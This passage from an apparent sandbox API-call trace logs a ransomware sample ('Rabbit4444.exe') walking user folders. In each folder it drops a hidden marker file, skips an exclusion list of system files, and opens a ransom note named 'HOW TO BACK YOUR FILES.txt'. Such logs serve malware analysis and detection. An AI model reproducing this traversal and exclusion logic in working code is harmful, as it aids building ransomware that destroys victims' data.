lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\" [0068.548] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" [0068.548] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0068.549] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0068.551] FlushFileBuffers (hFile=0x228) returned 1 [0068.553] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0068.554] CloseHandle (hObject=0x228) returned 1 [0068.554] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC") returned 81 [0068.554] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0068.554] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8156d87b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x36b47a04, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf22e7831, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0068.555] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.555] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.555] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0068.555] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.555] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8156d87b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x36b47a04, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf22e7831, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.555] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.555] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.555] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0068.555] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.555] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.555] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf22e7831, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf22e7831, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf22e7831, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0068.555] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.555] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0068.555] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc23ad9f8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd01f6699, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc23d3cb7, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppCache", cAlternateFileName="")) returned 1 [0068.555] lstrcmpiW (lpString1="AppCache", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.555] lstrcmpiW (lpString1="AppCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.555] lstrcmpiW (lpString1="AppCache", lpString2="Rabbit4444.exe") returned -1 [0068.555] lstrcmpiW (lpString1="AppCache", lpString2=".") returned 1 [0068.555] lstrcmpiW (lpString1="AppCache", lpString2="..") returned 1 [0068.555] lstrcmpiW (lpString1="AppCache", lpString2="windows") returned -1 [0068.555] lstrcmpiW (lpString1="AppCache", lpString2="bootmgr") returned -1 [0068.555] lstrcmpiW (lpString1="AppCache", lpString2="pagefile.sys") returned -1 [0068.555] lstrcmpiW (lpString1="AppCache", lpString2="boot") returned -1 [0068.555] lstrcmpiW (lpString1="AppCache", lpString2="ids.txt") returned -1 [0068.555] lstrcmpiW (lpString1="AppCache", lpString2="NTUSER.DAT") returned -1 [0068.555] lstrcpyW (in: lpString1=0x130ebdc, lpString2="AppCache" | out: lpString1="AppCache") returned="AppCache" [0068.555] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache", dwFileAttributes=0x2012) returned 1 [0068.556] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122100 [0068.556] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x1235c0 [0068.556] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122108 | out: ListHead=0xf68b0, ListEntry=0x122108) returned 0x11d048 [0068.556] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x81593ae3, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x1bf62139, ftLastAccessTime.dwHighDateTime=0x1d4ae7c, ftLastWriteTime.dwLowDateTime=0x1bf62139, ftLastWriteTime.dwHighDateTime=0x1d4ae7c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0068.556] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0068.556] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.556] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0068.556] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0068.556] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0068.556] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0068.556] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0068.556] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0068.556] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0068.556] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0068.556] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0068.556] lstrcpyW (in: lpString1=0x130ebdc, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0068.556] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0068.556] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fa0 [0068.556] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x1232c0 [0068.556] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fa8 | out: ListHead=0xf68b0, ListEntry=0x121fa8) returned 0x122108 [0068.556] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x81593ae3, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x466eaf94, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x466eaf94, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0068.556] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0068.557] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.557] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0068.557] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0068.557] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0068.557] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0068.557] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0068.557] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0068.557] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0068.557] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0068.557] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0068.557] lstrcpyW (in: lpString1=0x130ebdc, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0068.557] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0068.557] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fc0 [0068.557] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbc) returned 0xefb28 [0068.557] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fc8 | out: ListHead=0xf68b0, ListEntry=0x121fc8) returned 0x121fa8 [0068.557] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x81593ae3, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0316e46, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x81593ae3, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0068.557] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0068.557] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.557] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0068.557] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0068.558] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0068.558] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0068.558] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0068.558] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0068.558] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0068.558] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0068.558] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0068.558] lstrcpyW (in: lpString1=0x130ebdc, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0068.558] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0068.558] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0068.558] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbc) returned 0x105020 [0068.558] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x121fc8 [0068.558] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x823493b7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd036400a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc487bf98, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0068.558] lstrcmpiW (lpString1="Microsoft", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0068.558] lstrcmpiW (lpString1="Microsoft", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.558] lstrcmpiW (lpString1="Microsoft", lpString2="Rabbit4444.exe") returned -1 [0068.558] lstrcmpiW (lpString1="Microsoft", lpString2=".") returned 1 [0068.558] lstrcmpiW (lpString1="Microsoft", lpString2="..") returned 1 [0068.558] lstrcmpiW (lpString1="Microsoft", lpString2="windows") returned -1 [0068.558] lstrcmpiW (lpString1="Microsoft", lpString2="bootmgr") returned 1 [0068.558] lstrcmpiW (lpString1="Microsoft", lpString2="pagefile.sys") returned -1 [0068.558] lstrcmpiW (lpString1="Microsoft", lpString2="boot") returned 1 [0068.558] lstrcmpiW (lpString1="Microsoft", lpString2="ids.txt") returned 1 [0068.558] lstrcmpiW (lpString1="Microsoft", lpString2="NTUSER.DAT") returned -1 [0068.558] lstrcpyW (in: lpString1=0x130ebdc, lpString2="Microsoft" | out: lpString1="Microsoft") returned="Microsoft" [0068.558] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0068.558] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x123680 [0068.558] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x122368 [0068.559] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81593ae3, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd040b5ed, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x81593ae3, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0068.559] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0068.559] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.559] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0068.559] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0068.559] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0068.559] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0068.559] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0068.559] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0068.559] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0068.559] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0068.559] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0068.559] lstrcpyW (in: lpString1=0x130ebdc, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0068.559] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121f80 [0068.559] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x124530 [0068.559] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121f88 | out: ListHead=0xf68b0, ListEntry=0x121f88) returned 0x122008 [0068.559] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81593ae3, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd040b5ed, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x81593ae3, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0068.559] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0068.559] lstrcpyW (in: lpString1=0x130ebdc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0068.559] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0068.560] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0068.560] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0068.561] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.561] CloseHandle (hObject=0x280) returned 1 [0068.561] CloseHandle (hObject=0x228) returned 1 [0068.561] GetCurrentThreadId () returned 0xd98 [0068.561] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121f88 [0068.561] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp" [0068.561] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124530 | out: hHeap=0xe0000) returned 1 [0068.561] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121f80 | out: hHeap=0xe0000) returned 1 [0068.561] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp" [0068.561] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp\\" [0068.561] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0068.561] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0068.562] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0068.565] FlushFileBuffers (hFile=0x228) returned 1 [0068.565] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0068.566] CloseHandle (hObject=0x228) returned 1 [0068.566] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp") returned 86 [0068.566] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0068.566] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81593ae3, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd040b5ed, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf230dabb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0068.566] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.566] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.566] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0068.566] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.566] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81593ae3, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd040b5ed, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf230dabb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.567] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.567] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.567] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0068.567] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.567] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.567] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf230dabb, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf230dabb, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf230dabb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0068.567] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.567] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0068.567] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf230dabb, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf230dabb, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf230dabb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0068.567] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0068.567] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0068.567] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0068.567] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0068.568] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0068.568] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.568] CloseHandle (hObject=0x280) returned 1 [0068.568] CloseHandle (hObject=0x228) returned 1 [0068.568] 